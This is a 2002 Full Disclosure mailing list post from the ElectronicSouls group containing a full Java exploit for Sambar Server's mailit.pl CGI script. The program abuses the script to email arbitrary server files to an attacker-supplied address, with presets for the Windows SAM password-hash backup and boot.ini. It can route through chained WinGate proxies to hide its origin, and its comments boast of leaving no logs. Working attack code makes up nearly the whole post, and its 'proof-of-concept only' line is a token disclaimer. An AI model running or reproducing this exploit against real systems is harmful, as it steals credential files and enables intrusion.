Full Disclosure mailing list archives
[ElectronicSouls] - Sambar Exploit
From: es () hush com
Date: Fri, 29 Nov 2002 09:21:13 -0800
-----BEGIN PGP SIGNED MESSAGE----- Dear List, Here is an exploit for Sambar Server's mailit.pl, written in JAVA. we were taught JAVA by KF[0dd], the internet's premier exploit writing genius, and technical support to most ADM/0dd exploits. # cat SambarMailit.java /*---Written by Craig[TM]--- Electronicsouls-2001 * This little java Exploit will use Sambar Servers' mailit.pl * to send any file to your eMail address. * * To use this, you need a... * * - mail relay * - secure eMail address (http://www.hushmail.com) * - java compiler and a Sambar Server<=4.2 with mailit.pl of course * * When using WinGates, separate them with "," like this: * Enter Wingate/s>127.0.0.1,192.168.0.10,192.168.0.1 * * This exploit should leave NO logfiles - well, at least on my own server it did not! * * * BTW:I dunno if I may call this '0day' - somewhere on * a blackhead website i found a hint that there was an issue with * mailit.pl, so I figured it out... * * * [Craig] * * He...don't use this to deface...this is proof-of-concept code only! * * Last thing: BE PATIENT...THE EXPLOIT NEEDS SOME TIME TO RUN! * */ import java.io.*; import java.net.*; import java.util.*; public class SambarMailit { //line from server that is read in static String line=""; //arrays for wingates static String Wingates[]=new String[100]; //vars for the user input from console static String SMTPServer; static String Server; static String File; static String eMail; //the shit for the socket ;) static DataInputStream in = new DataInputStream (System.in); static DataInputStream sin; static PrintStream sout; static Socket s=null; //some "switches" int the program static boolean useWingates=false; static int Mode; //the user menu void HoleModus() { try { System.out.println("What do you want?"); System.out.println("(1) send me C:\\winnt\\repair\\sam._"); System.out.println("(2) send me C:\\boot.ini"); System.out.println("(3) send me a file I want"); System.out.println("(4) quit"); System.out.print(">"); DataInputStream in = new DataInputStream (System.in); String raw=in.readLine(); Mode=Integer.valueOf(raw).intValue(); if (Mode<1 || Mode>4 || Mode%1!=0) {System.out.println("invalid option! quitting...");System.exit(0);} if (Mode==4)System.exit(0); System.out.print("\n"); }//try catch (IOException e) {System.out.println("Error reading input from Console:"+e);} }//get() //ask user for server void HoleServer() { try { System.out.print("Enter Server>"); DataInputStream in = new DataInputStream (System.in); Server=in.readLine(); }//try catch (IOException e) {System.out.println("Error reading input from Console:"+e);} }//get() //ask user for wingates - i would strongly suggest to use this! void HoleWingates() { try { System.out.print("Enter Wingate/s>"); DataInputStream in = new DataInputStream (System.in); String WingatesRaw=in.readLine(); StringTokenizer token = new StringTokenizer(WingatesRaw, ","); int num_tokens = token.countTokens(); for (int i = 0;i< num_tokens;i++) { Wingates[i]=token.nextToken(); Wingates[i]=Wingates[i].trim(); } if (Wingates[0]!=null && Wingates[0]!="")useWingates=true; //for (int i=0;Wingates[i]!=null;i++)System.out.println("Wingate["+i+"]:"+Wingates[i]); }//try catch (IOException e) {System.out.println("Error with your Wingates:"+e);} }//HoleWingates //ask user where to download and so on... void HoleOptions() { try { System.out.print("Mail relay>"); in = new DataInputStream (System.in); SMTPServer=in.readLine(); System.out.print("My eMail>"); in = new DataInputStream (System.in); eMail=in.readLine(); if (Mode==3) { System.out.print("File to send>"); DataInputStream in = new DataInputStream (System.in); File=in.readLine(); } } catch (IOException e){System.out.println("Error reading input from Console:"+e);} }// //connect to the server with or without WinGates void Verbinde() { try { if (useWingates==true) { s = new Socket(Wingates[0], 23); sin = new DataInputStream (s.getInputStream()); sout = new PrintStream (s.getOutputStream()); for (int i=1;Wingates[i]!=null;i++) { System.out.println("Trying to connect to "+Wingates[i]+"..."); sout.println(Wingates[i]+" 23"); line=sin.readLine(); System.out.println(line); } System.out.println("Now trying to connect to "+Server+":80..."); sout.println(Server+" 80"); System.out.println((line=sin.readLine())); } else { s = new Socket(Server, 80); sin = new DataInputStream (s.getInputStream()); sout = new PrintStream (s.getOutputStream()); } }//try catch (IOException e){System.out.println("Error Connecting:"+e);} }//verbinde() //main program public static void main(String[] args) { System.out.println("\nCraig's Sambar<=4.2 (0day?) mailit.pl Exploit"); SambarMailit Sam=new SambarMailit(); Sam.HoleModus(); Sam.HoleServer(); Sam.HoleWingates(); Sam.HoleOptions(); try { if (Mode==1)File="C:\\winnt\\repair\\sam._"; if (Mode==2)File="C:\\boot.ini"; Sam.Verbinde(); sout.println("POST /cgi-bin/mailit.pl HTTP/1.1"); sout.println("Content-Type: application/x-www-form-urlencoded"); sout.println("User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"); sout.println("Host: "+Server); //for the POST command, we need to know the exact length of data to send int l=72+Server.length()+SMTPServer.length()+eMail.length()+File.length(); sout.println("Content-Length: "+l); sout.println("Connection: Keep-Alive\n"); sout.println("server="+SMTPServer+"&recipient="+eMail+"&body=Phile4U&attach="+File/*C%3A%5Cwinnt%5Crepai r%5Csam._*/+"&from=hacked@"+Server+"&subject=Sambar-File"); System.out.println(); while (true) { line=sin.readLine(); if (line==null)break; System.out.println(line); if (line.indexOf("MailIt Failed")>-1) {System.out.println("ERROR!\n\n");break;} if (line.indexOf("MailIt Succeeded.")>-1) {System.out.println("SUCCESS!\n\n");break;} } s.close(); }//try catch (IOException e){System.out.println("Error!:"+e);} }//public }//class # The Electronic Souls Crew [ElectronicSouls] (c) 2002 "Short Music For Short People." -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wlMEARECABMFAj3nohoMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltZQIAoID2JahMWrfN jLArXryWRpZJuKjVAKC+RHRdI7jWnflBbiJVMfmEB1SOOA== =8b73 -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [ElectronicSouls] - Sambar Exploit es (Nov 29)